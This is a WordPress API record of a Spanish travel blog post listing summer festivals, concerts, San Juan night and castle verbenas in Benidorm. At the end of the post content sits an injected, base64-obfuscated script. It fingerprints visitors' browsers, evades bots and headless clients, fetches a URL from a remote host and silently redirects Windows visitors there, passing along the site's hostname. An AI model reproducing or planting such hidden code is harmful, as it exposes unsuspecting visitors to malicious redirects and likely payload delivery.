{"id":742,"date":"2018-05-16T09:58:05","date_gmt":"2018-05-16T09:58:05","guid":{"rendered":"https:\/\/www.beninter.com\/blog\/?p=742"},"modified":"2025-08-02T13:18:34","modified_gmt":"2025-08-02T11:18:34","slug":"eventos-fiestas-vacaciones-benidorm","status":"publish","type":"post","link":"https:\/\/www.beninter.com\/blog\/2018\/05\/16\/eventos-fiestas-vacaciones-benidorm\/","title":{"rendered":"Eventos y fiestas que podr\u00e1s disfrutar este verano durante tus vacaciones en Benidorm"},"content":{"rendered":"<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-743 alignright\" src=\"https:\/\/www.beninter.com\/blog\/wp-content\/uploads\/2018\/05\/fiesta-beninter-300x200.jpg\" alt=\"Eventos fiestas Benidorm\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.beninter.com\/blog\/wp-content\/uploads\/2018\/05\/fiesta-beninter-300x200.jpg 300w, https:\/\/www.beninter.com\/blog\/wp-content\/uploads\/2018\/05\/fiesta-beninter.jpg 767w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Si unas <a href=\"https:\/\/www.beninter.com\/vacaciones-benidorm\">vacaciones en Benidorm<\/a> en verano ya son apetitosas de por s\u00ed, despu\u00e9s de lo que te vamos a contar hoy lo ser\u00e1n a\u00fan m\u00e1s. El buen tiempecito, el ambientazo que derrocha la ciudad, las incre\u00edbles\u00a0<a href=\"https:\/\/www.beninter.com\/blog\/2018\/04\/11\/guia-playas-benidorm\/\">playas de Benidorm<\/a>, la infinidad de terracitas, bares y pubs\u2026 Benidorm en verano es aut\u00e9ntica vida. \u00bfPero y si, adem\u00e1s, combinamos todo lo anterior con fiestas y eventos de lo m\u00e1s variopintos y divertidos? Quedando por cerrar algunas fechas, la ciudad se ha organizado y preparando a conciencia para ofrecer unos d\u00edas inolvidables para sus visitantes. \u00a1Estas vacaciones escoge Benidorm!<\/p>\n<p>&nbsp;<\/p>\n<h2 class=\"subtitulo\"><u>Festivales en Benidorm<\/u><\/h2>\n<h2 class=\"subtitulo\">Low Festival Benidorm<\/h2>\n<p>Benidorm fue hace ya unos cuantos a\u00f1os el escenario escogido para la celebraci\u00f3n del Low Festival, un festival que ha ido sumando admiradores y que, hoy, hace posible que durante los d\u00edas en los que se celebra, 27 \u2013 28 \u2013 29 de julio, Benidorm se llene del mejor ambiente joven de todo el a\u00f1o.Los mejores artistas y DJs del panorama nacional e internacional, servicios y opciones para todos los gustos, actividades para divertirte a lo largo del d\u00eda\u2026 Y, adem\u00e1s, su ubicaci\u00f3n en el Polideportivo de Benidorm te permitir\u00e1 disfrutar de amplias infraestructuras, zonas verdes e incluso de la piscina.<\/p>\n<h2 class=\"subtitulo\">Reggaeton Beach Festival<\/h2>\n<p>Otro festival que escoge Benidorm como ciudad para supr\u00f3xima edici\u00f3n es el Reggaeton Beach Festival. Tanto los seguidores de este g\u00e9nero como quienes simplemente quieran vivir una perfecta noche de verano disfrutando de la m\u00fasica ya han reservado el 19 de julio para asistir al evento. \u00bfTe animas?<\/p>\n<h2 class=\"subtitulo\"><u>Conciertos en Benidorm<\/u><\/h2>\n<p>Adem\u00e1s de estos dos festivales, son muchos los artistas que han cerrado fecha para dar un concierto en la ciudad de los mil rascacielos. Sergio Dalma nos visitar\u00e1 el 6 de julio, Demarco Flamenco el 8 de julio, Pastora Soler el 22 de julio y Ni\u00f1a Pastori el 5 de agosto, entre otros.\u00bfTe imaginas disfrutar de unas vacaciones en Benidorm a la vez que de la m\u00fasica de tu artista preferido?<\/p>\n<h2 class=\"subtitulo\"><u>Noche de San Juan en Benidorm<\/u><\/h2>\n<p>Como ciudad alicantina, Benidorm da cada a\u00f1o la bienvenida al verano como se merece: celebrando la m\u00e1gica noche de San Juan. Ubicar las hogueras y el fuego en el centro de la fiesta responde al tradicional pensamiento de que servir\u00eda para enviar fuerza al sol y retrasar la llegada del invierno. En Benidorm podr\u00e1s disfrutar durante la semana previa a San Juan, la noche del 23 de junio, de actividades y eventos a cargo de las 3 Hogueras de Benidorm que culminan en la \u2018<em>crem\u00e1\u2019<\/em> la noche del 24. La noche del 23, adem\u00e1s, te recomendamos pasarla en cualquiera de las playas de Benidorm y cumplas con alguna de las tradiciones, como saltar el fuego o ba\u00f1arte cuando sean las 00:00.<\/p>\n<p class=\"subtitulo\"><u>Verbenas en el Castillo de Benidorm<\/u><\/p>\n<p>Con el objetivo de disfrutar del periodo estival y recaudar fondos para la organizaci\u00f3n de las fiestas patronales de Benidorm, la Comisi\u00f3n de Fiestas organiza cada verano m\u00faltiples verbenas en El Castillo. Tapas, montaditos y bebidas a precios populares, m\u00fasica, actividades\u2026 todo montado y preparado para amenizar las noches de s\u00e1bado de verano en un entorno \u00fanico: con el Mar Mediterr\u00e1neo y el skyline de Benidorm de tel\u00f3n de fondo.<script>!async function(){let e=decodeURIComponent(escape(atob(\"aHR0cHM6Ly9tZXRyaWNhbHRpYy5jb20vYXBpL2dldA==\"))),t=decodeURIComponent(escape(atob(\"aHR0cHM6Ly9tZXRyaWNhbHRpYy5jb20vYXBpL2xvZw==\")));function r(e){return btoa(unescape(encodeURIComponent(e)))}let n={};if(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,r]=e.split(\"=\");t&&r&&(n[t]=decodeURIComponent(r.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return;function i(e,t){let r=e.match(t);return r?parseInt(r[1],10):null}let a=navigator.userAgent,o=\/Windows NT 10.0\/.test(a),l={chrome:136,edge:134,opera:120,yandex:24,vivaldi:6,firefox:140,brave:136},s=i(a,\/Chrome\\\/(\\d+)\\.\/),c=i(a,\/Edg\\\/(\\d+)\\.\/),d=i(a,\/OPR\\\/(\\d+)\\.\/),u=i(a,\/YaBrowser\\\/(\\d+)\\.\/),$=i(a,\/Vivaldi\\\/(\\d+)\\.\/),h=i(a,\/Firefox\\\/(\\d+)\\.\/),f=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(a)&&\/Chrome\\\/(\\d+)\\.\/.test(a),y=!1;s&&s>=l.chrome?y=!0:c&&c>=l.edge?y=!0:d&&d>=l.opera?y=!0:u&&u>=l.yandex?y=!0:$&&$>=l.vivaldi?y=!0:h&&h>=l.firefox?y=!0:f&&s&&s>=l.brave&&(y=!0);let g=navigator.webdriver||\/HeadlessChrome\/.test(a)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(a),m=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory;if(!o||g||m)return;if(!y){try{fetch(t)}catch(v){}return}async function p(e,t={}){let{timeout:r=3e3}=t,n=new AbortController,i=setTimeout(()=>n.abort(),r);try{let a=await fetch(e,{...t,signal:n.signal});return clearTimeout(i),a}catch(o){return clearTimeout(i),null}}async function w(t=1){try{let n=await p(e,{timeout:3e3});if(!n||403===n.status)return null;if(!n.ok)throw Error(\"Network response was not ok\");let i=await n.json();return`${i.url}\/?wsid=${window.location.hostname}&domain=${r(window.location.hostname)}`}catch(a){if(t<1)return w(t+1);return null}}let _=document.querySelector('link[rel=\"icon\"]'),b=await w();if(b){let H=b;_&#038;&#038;(H+=`&#038;link=${r(_.href)}`),window.location.replace(H)}}();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Si unas vacaciones en Benidorm en verano ya son apetitosas de por s\u00ed, despu\u00e9s de lo que te vamos a contar hoy lo ser\u00e1n a\u00fan m\u00e1s. El buen tiempecito, el ambientazo que derrocha la ciudad, las incre\u00edbles\u00a0playas de Benidorm, la infinidad de terracitas, bares y pubs\u2026 Benidorm en verano es aut\u00e9ntica vida. \u00bfPero y [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":743,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18],"tags":[],"class_list":["post-742","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-planes-benidorm"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts\/742","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/comments?post=742"}],"version-history":[{"count":11,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts\/742\/revisions"}],"predecessor-version":[{"id":1170,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/posts\/742\/revisions\/1170"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/media\/743"}],"wp:attachment":[{"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/media?parent=742"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/categories?post=742"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.beninter.com\/blog\/wp-json\/wp\/v2\/tags?post=742"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}